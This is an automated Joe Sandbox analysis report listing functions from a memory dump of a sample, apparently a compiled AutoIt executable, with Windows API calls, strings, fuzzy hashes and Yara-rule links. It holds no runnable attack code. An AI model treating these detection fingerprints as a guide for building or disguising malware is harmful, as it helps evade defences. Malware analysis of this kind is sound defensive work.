Opcode ID: 084772eb107aadc615e06f6bd9649fd6a74c784462a751deb686d3f500cf5365
Instruction ID: 97546114243909e2fcabf5df30a1f35fe066164ab8f3962686ea705f9e14c265
Opcode Fuzzy Hash: 084772eb107aadc615e06f6bd9649fd6a74c784462a751deb686d3f500cf5365
Instruction Fuzzy Hash: 8B514C76904209EFCB26CFA8DC84AAEBBB9EF48310F14851AF95997250D771AD408B50

Function 003E0E1A Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31

Strings

HKEY_CURRENT_CONFIG, xrefs: 003E0EEE
HKCR, xrefs: 003E0ED9
HKCC, xrefs: 003E0EFF
HKEY_USERS, xrefs: 003E0F32
HKEY_CLASSES_ROOT, xrefs: 003E0EC4
HKU, xrefs: 003E0F43
8], xrefs: 003E0E89
HKEY_CURRENT_USER, xrefs: 003E0F10
HKEY_LOCAL_MACHINE, xrefs: 003E0E9A
HKLM, xrefs: 003E0EAF
HKCU, xrefs: 003E0F21

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: BuffCharUpper
String ID: 8]$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-3946851757
Opcode ID: 33a03160edcbbadc3fb274cbf2400db9301788cebdfbdc0fdf9e806cdc467643
Instruction ID: 84a61d1c85112a3de9fa92fa7cfa81084289e26a077c596ab975b0898f7f391d
Opcode Fuzzy Hash: 33a03160edcbbadc3fb274cbf2400db9301788cebdfbdc0fdf9e806cdc467643
Instruction Fuzzy Hash: BE41B03150439A8BCF1AEF10D8A2AEF3364AF11304F454565FC911B295DB789DAACBA0

Function 00366A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00380957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00366B0C,?,00008000), ref: 00380973

Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00366BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00366CFA

Part of subcall function 0036586D: _wcscpy.LIBCMT ref: 003658A5

Part of subcall function 0038363D: _iswctype.LIBCMT ref: 00383645

Strings

EA06, xrefs: 0039E452
Bad directive syntax error, xrefs: 0039E79D
>>>AUTOIT SCRIPT<<<, xrefs: 0039E496
AU3!, xrefs: 00366B61
Unterminated string, xrefs: 0039E7E4
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0039E421
Error opening the file, xrefs: 0039E43D, 0039E4B8

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 9be4e25e71b490e8a7d70fa3b1893e89c1712b5dd173dc7e09dc73f6cad42510
Instruction ID: 20958010e23b040b8a751b825ec6b95ce947de89cf65c95ddacaef47433f6ece
Opcode Fuzzy Hash: 9be4e25e71b490e8a7d70fa3b1893e89c1712b5dd173dc7e09dc73f6cad42510
Instruction Fuzzy Hash: CA02BE311083419FCB26EF24C891AAFBBE5FF95354F10892DF4959B2A2DB30D949CB52

Function 003C2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003C2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003C2DDD
GetMenuItemCount.USER32(00425890), ref: 003C2E66
DeleteMenu.USER32(00425890,00000005,00000000,000000F5,?,?), ref: 003C2EF6
DeleteMenu.USER32(00425890,00000004,00000000), ref: 003C2EFE
DeleteMenu.USER32(00425890,00000006,00000000), ref: 003C2F06
DeleteMenu.USER32(00425890,00000003,00000000), ref: 003C2F0E
GetMenuItemCount.USER32(00425890), ref: 003C2F16
SetMenuItemInfoW.USER32(00425890,00000004,00000000,00000030), ref: 003C2F4C
GetCursorPos.USER32(?), ref: 003C2F56
SetForegroundWindow.USER32(00000000), ref: 003C2F5F
TrackPopupMenuEx.USER32(00425890,00000000,?,00000000,00000000,00000000), ref: 003C2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003C2F7E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 0ff13af35fade2981324e2f61bd7896e7b68913b16ead91b84be95fadeaf0cf9
Instruction ID: 6ccc0cc7b587e832c3c94ae962c3f4538fd7a4c09147ac6123a1e85b536a7f6a
Opcode Fuzzy Hash: 0ff13af35fade2981324e2f61bd7896e7b68913b16ead91b84be95fadeaf0cf9
Instruction Fuzzy Hash: 1771A270600259BEEB229F64DC89FABBF68FF05354F14421AF625EA1E1C7B16C10DB91

Function 003D88AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003D88D7
CoInitialize.OLE32(00000000), ref: 003D8904
CoUninitialize.OLE32 ref: 003D890E
GetRunningObjectTable.OLE32(00000000,?), ref: 003D8A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 003D8B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003F2C0C), ref: 003D8B6F
CoGetObject.OLE32(?,00000000,003F2C0C,?), ref: 003D8B92
SetErrorMode.KERNEL32(00000000), ref: 003D8BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003D8C25
VariantClear.OLEAUT32(?), ref: 003D8C35

Strings

,,?, xrefs: 003D88C1

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,?
API String ID: 2395222682-1094787077
Opcode ID: 5c0c64602abdc4c21debcb99a27d4c37fc77db65c431f1c487796a8a8624b997
Instruction ID: 746aae8dc4c82b6e3482aa1c36c17a9c74daf26525238c8a751cf51950231374
Opcode Fuzzy Hash: 5c0c64602abdc4c21debcb99a27d4c37fc77db65c431f1c487796a8a8624b997
Instruction Fuzzy Hash: 48C114B2608305AFC701DF64D88496AB7E9FF89348F00491EF98A9B261DB71ED05CB52

Function 003BF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0039E2A0,00000010,?,Bad directive syntax error,003EF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003BF7C2
LoadStringW.USER32(00000000,?,0039E2A0,00000010), ref: 003BF7C9

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

_wprintf.LIBCMT ref: 003BF7FC
__swprintf.LIBCMT ref: 003BF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003BF88D

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 003BF7F7
Line %d (File "%s"):, xrefs: 003BF833
Error: , xrefs: 003BF85B
Line %d:, xrefs: 003BF818
., xrefs: 003BF873

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 7b6ada2ce4853b7387d1ec0b6cb46fef6f70de5f2a68a5cac7e0759be7a21dcd
Instruction ID: bc008beeb485bf39a46aa74906f94a25dd616f096297ed4a6b57c3531926154e
Opcode Fuzzy Hash: 7b6ada2ce4853b7387d1ec0b6cb46fef6f70de5f2a68a5cac7e0759be7a21dcd
Instruction Fuzzy Hash: B6213C3290021EEFCF13AF90CC4AEEE7779BF18304F04486AF5156A1A2EA719658DB51

Function 003C52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06

Part of subcall function 00367924: _memmove.LIBCMT ref: 003679AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003C5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003C5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003C5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003C5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003C537A

Strings

open , xrefs: 003C52DF
play PlayMe wait, xrefs: 003C5364
alias PlayMe, xrefs: 003C5309
play PlayMe, xrefs: 003C5375
status PlayMe mode, xrefs: 003C532B
close PlayMe, xrefs: 003C5341, 003C536E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 5c965bb7f71f457169cbf1d251d3f40f89602751e635fc96a3572c32502edf73
Instruction ID: e45ef0be6072be581803c245f6ae6a1f44f8efa3fd3e087cfd17244bdc49f000
Opcode Fuzzy Hash: 5c965bb7f71f457169cbf1d251d3f40f89602751e635fc96a3572c32502edf73
Instruction Fuzzy Hash: 29118231A5016979D721B661CC4AFFF7BBCEBD5B84F50042EB411E60D5DEA01D84CAA4

Function 003C46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 003C46D2
gethostname.WSOCK32(?,00000100), ref: 003C46EC
gethostbyname.WSOCK32(?), ref: 003C46F9
_wcscpy.LIBCMT ref: 003C4721
_memmove.LIBCMT ref: 003C4734
inet_ntoa.WSOCK32(?), ref: 003C473F
_strcat.LIBCMT ref: 003C474D
_wcscpy.LIBCMT ref: 003C4764
WSACleanup.WSOCK32 ref: 003C4772
_wcscpy.LIBCMT ref: 003C4780

Strings

0.0.0.0, xrefs: 003C471B

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: d894d4ec1f83ed4283f7690834220d2bb78acfa263f1123b50d5c11474dbd5d1
Instruction ID: 20edce0676322692a08db4af5df5a25c749d8c4fa272f21b0a8a73dbc74a8a7d
Opcode Fuzzy Hash: d894d4ec1f83ed4283f7690834220d2bb78acfa263f1123b50d5c11474dbd5d1
Instruction Fuzzy Hash: 8011D531900214AFCB27BB309C86FDA77BCEB01711F0502BAF855DA091EFB59E858750

Function 003C4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 003C4F7A

Part of subcall function 0038049F: timeGetTime.WINMM(?,7707B400,00370E7B), ref: 003804A3

Sleep.KERNEL32(0000000A), ref: 003C4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 003C4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003C4FEC
SetActiveWindow.USER32 ref: 003C500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003C5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 003C5038
Sleep.KERNEL32(000000FA), ref: 003C5043
IsWindow.USER32 ref: 003C504F
EndDialog.USER32(00000000), ref: 003C5060

Strings

BUTTON, xrefs: 003C4FDE

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: b3df05cc126145e132f874779a8ed5799d08a00a75e5059587117f619a1ea79f
Instruction ID: c483e73b72d4bac21d754b2f7802e5e924b264e983573ee246d47fe59309a152
Opcode Fuzzy Hash: b3df05cc126145e132f874779a8ed5799d08a00a75e5059587117f619a1ea79f
Instruction Fuzzy Hash: 20215470204644BFE7325B20ECC8F263A6DEB55749F46113CF501CA1E1CAB19E919B66

Function 003CD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

CoInitialize.OLE32(00000000), ref: 003CD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003CD67D
SHGetDesktopFolder.SHELL32(?), ref: 003CD691
CoCreateInstance.OLE32(003F2D7C,00000000,00000001,00418C1C,?), ref: 003CD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003CD74C
CoTaskMemFree.OLE32(?,?), ref: 003CD7A4
_memset.LIBCMT ref: 003CD7E1
SHBrowseForFolderW.SHELL32(?), ref: 003CD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003CD840
CoTaskMemFree.OLE32(00000000), ref: 003CD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003CD87E
CoUninitialize.OLE32(00000001,00000000), ref: 003CD880

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 087ce328a5b96a264dd67fc81942dde9a770e29dcb4b90185c883ffc03dd9672
Instruction ID: e7c9af46e04fd33ff54d975446f107e2be1e60160744028c00d8ef4b072e064d
Opcode Fuzzy Hash: 087ce328a5b96a264dd67fc81942dde9a770e29dcb4b90185c883ffc03dd9672
Instruction Fuzzy Hash: 33B1F975A00109AFDB15DFA4C885EAEBBB9FF48304F1485A9F909EB261DB30ED45CB50

Function 003BC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 003BC283
GetWindowRect.USER32(00000000,?), ref: 003BC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003BC2F3
GetDlgItem.USER32(?,00000002), ref: 003BC2FE
GetWindowRect.USER32(00000000,?), ref: 003BC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003BC364
GetDlgItem.USER32(?,000003E9), ref: 003BC372
GetWindowRect.USER32(00000000,?), ref: 003BC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003BC3C6
GetDlgItem.USER32(?,000003EA), ref: 003BC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003BC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 003BC3FE

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 5bc63f73efca4f3e5d63334ab7ff9499d4651afc3b222d9bc9b679d2c14af982
Instruction ID: 0cc4d3675484d8d0307853c010ad93c73823edccd7a8f888986324696ef948bd
Opcode Fuzzy Hash: 5bc63f73efca4f3e5d63334ab7ff9499d4651afc3b222d9bc9b679d2c14af982
Instruction Fuzzy Hash: 47514571B10205AFDF19CFA9DD95AAEBBBAEB88710F14852DF619D72D0D7B09D008B10

Function 0036201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00361B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00362036,?,00000000,?,?,?,?,003616CB,00000000,?), ref: 00361B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003620D3
KillTimer.USER32(-00000001,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0036216E
DestroyAcceleratorTable.USER32(00000000), ref: 0039BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BD0A
DeleteObject.GDI32(00000000), ref: 0039BD1C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 978596c4a0a4317b8916a04c6c44012a6e8cdd63344d66a6efb6e790501c57a7
Instruction ID: bb28aab3e1e019db7ebe4f3dec72326c906aee24782f1994472ea162c4f511d2
Opcode Fuzzy Hash: 978596c4a0a4317b8916a04c6c44012a6e8cdd63344d66a6efb6e790501c57a7
Instruction Fuzzy Hash: 88618C30201A50DFCB37AF14D988B2AB7F5FB40312F52C529E5429B9B8C7B4A891DF54

Function 003621A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC

GetSysColor.USER32(0000000F), ref: 003621D3

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: ce9ae9ed0905cb4b71766bf660905bbeb69d4b1df5f9c67c68e321c990354f46
Instruction ID: 357a0d9da4ea80a5aa9f6c74d67a81a56fb5f13e11353e677db2405f4f8a1b47
Opcode Fuzzy Hash: ce9ae9ed0905cb4b71766bf660905bbeb69d4b1df5f9c67c68e321c990354f46
Instruction Fuzzy Hash: F5419F311009449FDB235F28EC98BBA3B69EB06321F168765FE658E1E9C7718D42DB21

Function 003CA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,003EF910), ref: 003CA90B
GetDriveTypeW.KERNEL32(00000061,004189A0,00000061), ref: 003CA9D5
_wcscpy.LIBCMT ref: 003CA9FF

Strings

network, xrefs: 003CA969
all, xrefs: 003CA911
unknown, xrefs: 003CA996
ramdisk, xrefs: 003CA97F
cdrom, xrefs: 003CA927
removable, xrefs: 003CA93D
fixed, xrefs: 003CA953

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: e98d87326a9310e07bc2da509a46801002bcd0a56805874843dbe9de2e25e5e3
Instruction ID: 53ad8a402c02e5fb258b5fe595a38965cd56abc9d80557abdd29fe9a25e93d35
Opcode Fuzzy Hash: e98d87326a9310e07bc2da509a46801002bcd0a56805874843dbe9de2e25e5e3
Instruction Fuzzy Hash: 8751A0355183049BC706EF14C892FAFB7A9EF84308F15882DF4959B2A2DB319D09CB53

Function 00369837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00369862
__swprintf.LIBCMT ref: 003698AC
__i64tow.LIBCMT ref: 0039F5E6

Strings

0x%p, xrefs: 0039F5C8
%.15g, xrefs: 003698A6
True, xrefs: 0039F5A7
False, xrefs: 0039F5AE

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: d43b1af3d4153c0ee10d2b3e13bb17a48c9d5b44b9b6934f4afa8ea90e5aa3bf
Instruction ID: cc2fa0a2fb218c562da61c9b174cae607d5a8a5fd2511ac1a725399ea1effda5
